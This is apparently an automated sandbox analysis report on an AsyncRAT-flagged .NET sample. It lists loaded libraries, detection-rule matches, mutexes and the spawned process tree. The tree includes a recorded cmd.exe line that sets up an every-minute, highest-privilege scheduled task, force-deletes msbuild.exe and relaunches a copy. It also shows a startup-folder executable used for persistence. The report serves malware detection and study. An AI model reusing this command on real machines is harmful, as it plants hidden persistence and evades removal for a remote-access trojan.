                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: srvcli.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: netutils.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: schannel.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: mskeyprotect.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: msasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: dpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: gpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: ncryptsslp.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exeSection loaded: webengine4.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeSection loaded: dwrite.dll
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeSection loaded: textshaping.dll
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeSection loaded: dwrite.dll
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeSection loaded: msvcp140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeSection loaded: windows.applicationmodel.dll
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeSection loaded: twinapi.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeSection loaded: userenv.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: webengine4.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: userenv.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: propsys.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: edputil.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: urlmon.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iertutil.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: srvcli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: netutils.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wintypes.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: appresolver.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: bcp47langs.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: slc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sppc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                  Source: C:\Windows\SysWOW64\chcp.comSection loaded: ulib.dll
                  Source: C:\Windows\SysWOW64\chcp.comSection loaded: fsutilext.dll
                  Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dll
                  Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dll
                  Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeSection loaded: dwrite.dll
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeSection loaded: urlmon.dll
                  Source: 3.2.jsc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 0.2.SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe.16e9aca9960.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 0.2.SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe.16e9aca9960.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 00000000.00000002.1666528793.0000016E9AC91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 00000003.00000002.3891974556.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, LockContentionCountCustomAttributeEncodedArgument.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: 0.2.SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe.16e9aca9960.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe.16e9aca9960.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe.16e9aca9960.0.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                  Source: spczxf.exe.3.dr, AddNonscalarCompareScalarNotLessThanOrEqual.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: ohvrxt.exe.3.dr, ----.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: hgzxhw.exe.3.dr, DefineGlobalMethodLdloc0.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: msbuild.exe.27.dr, TaskParameter.csTask registration methods: 'CreateNewTaskItemFrom'
                  Source: msbuild.exe.27.dr, OutOfProcTaskHostNode.csTask registration methods: 'RegisterTaskObject', 'UnregisterPacketHandler', 'RegisterPacketHandler', 'UnregisterTaskObject', 'GetRegisteredTaskObject'
                  Source: msbuild.exe.27.dr, TaskLoader.csTask registration methods: 'CreateTask'
                  Source: msbuild.exe.27.dr, RegisteredTaskObjectCacheBase.csTask registration methods: 'GetLazyCollectionForLifetime', 'RegisterTaskObject', 'DisposeObjects', 'IsCollectionEmptyOrUncreated', 'UnregisterTaskObject', 'DisposeCacheObjects', 'GetRegisteredTaskObject', 'GetCollectionForLifetime'
                  Source: msbuild.exe.27.dr, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent(bool)
                  Source: msbuild.exe.27.dr, NodeEndpointOutOfProcBase.csSecurity API names: System.IO.Pipes.PipeSecurity.AddAccessRule(System.IO.Pipes.PipeAccessRule)
                  Source: msbuild.exe.27.dr, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe.16e9aca9960.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 0.2.SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe.16e9aca9960.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 21.2.hgzxhw.exe.29263e4aa50.2.raw.unpack, fAGAKo.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 21.2.hgzxhw.exe.29263e4aa50.2.raw.unpack, fAGAKo.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 21.2.hgzxhw.exe.29263e4e490.1.raw.unpack, fAGAKo.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 21.2.hgzxhw.exe.29263e4e490.1.raw.unpack, fAGAKo.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: msbuild.exe.27.dr, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: msbuild.exe.27.dr, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: msbuild.exe, 00000027.00000002.2594043782.0000000002511000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\system32\*.sln
                  Source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1665839826.0000016E99254000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbe
                  Source: msbuild.exe, 00000025.00000000.2320139777.0000000000062000.00000002.00000001.01000000.00000013.sdmp, msbuild.exe.27.drBinary or memory string: .configAMSBUILDDIRECTORYDELETERETRYCOUNTCMSBUILDDIRECTORYDELETRETRYTIMEOUT.sln
                  Source: msbuild.exe, 00000025.00000000.2320139777.0000000000062000.00000002.00000001.01000000.00000013.sdmp, msbuild.exe.27.drBinary or memory string: MSBuild MyApp.sln /t:Rebuild /p:Configuration=Release
                  Source: msbuild.exe, 00000025.00000000.2320139777.0000000000062000.00000002.00000001.01000000.00000013.sdmp, msbuild.exe.27.drBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
                  Source: msbuild.exe, 00000025.00000002.2334565307.0000000000682000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Users\user\Desktop\<.slnh(`h
                  Source: msbuild.exe, 00000025.00000002.2349901053.00000000022F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q C:\Users\user\Desktop\*.sln
                  Source: msbuild.exe, 00000025.00000000.2320139777.0000000000062000.00000002.00000001.01000000.00000013.sdmp, msbuild.exe, 00000025.00000002.2349901053.00000000022F1000.00000004.00000800.00020000.00000000.sdmp, msbuild.exe, 00000027.00000002.2594043782.0000000002511000.00000004.00000800.00020000.00000000.sdmp, msbuild.exe.27.drBinary or memory string: *.sln
                  Source: msbuild.exe, 00000025.00000000.2320139777.0000000000062000.00000002.00000001.01000000.00000013.sdmp, msbuild.exe.27.drBinary or memory string: MSBuild MyApp.csproj /t:Clean
                  Source: msbuild.exe, 00000025.00000000.2320139777.0000000000062000.00000002.00000001.01000000.00000013.sdmp, msbuild.exe.27.drBinary or memory string: /ignoreprojectextensions:.sln
                  Source: spczxf.exe, 00000008.00000002.1740777553.000001A4CD9E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
                  Source: msbuild.exe, 00000025.00000000.2320139777.0000000000062000.00000002.00000001.01000000.00000013.sdmp, msbuild.exe.27.drBinary or memory string: MSBUILD : error MSB1048: Solution files cannot be debugged directly. Run MSBuild first with an environment variable MSBUILDEMITSOLUTION=1 to create a corresponding ".sln.metaproj" file. Then debug that.
                  Source: classification engineClassification label: mal100.troj.adwa.spyw.expl.evad.mine.winEXE@96/54@2/3
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\tc.txt
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5412:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3988:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6440:120:WilError_03
                  Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2908
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7096:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4424:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:640:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5172:120:WilError_03
                  Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess432
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeMutant created: \Sessions\1\BaseNamedObjects\bUezpCDHVjUVS3W9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\qjtceeyroh
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1568:120:WilError_03
                  Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1384
                  Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3660
                  Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5788
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeFile created: C:\Users\user\AppData\Local\Temp\spczxf.exeJump to behavior
                  Source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeReversingLabs: Detection: 44%
                  Source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeVirustotal: Detection: 48%
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe"
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 384 -p 432 -ip 432
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 432 -s 1216
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess created: C:\Users\user\AppData\Local\Temp\spczxf.exe "C:\Users\user\AppData\Local\Temp\spczxf.exe"
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 544 -p 2908 -ip 2908
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2908 -s 3156
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe"
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess created: C:\Users\user\AppData\Local\Temp\ohvrxt.exe "C:\Users\user\AppData\Local\Temp\ohvrxt.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess created: C:\Users\user\AppData\Local\Temp\hgzxhw.exe "C:\Users\user\AppData\Local\Temp\hgzxhw.exe"
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 496 -p 1384 -ip 1384
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1384 -s 1200
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 544 -p 3660 -ip 3660
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3660 -s 3136
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "msbuild" /sc MINUTE /tr "C:\Users\user\AppData\Local\ServiceHub\msbuild.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" &&START "" "C:\Users\user\AppData\Local\ServiceHub\msbuild.exe"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess created: C:\Users\user\AppData\Local\Temp\utntwb.exe "C:\Users\user\AppData\Local\Temp\utntwb.exe"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "msbuild" /sc MINUTE /tr "C:\Users\user\AppData\Local\ServiceHub\msbuild.exe" /rl HIGHEST /f
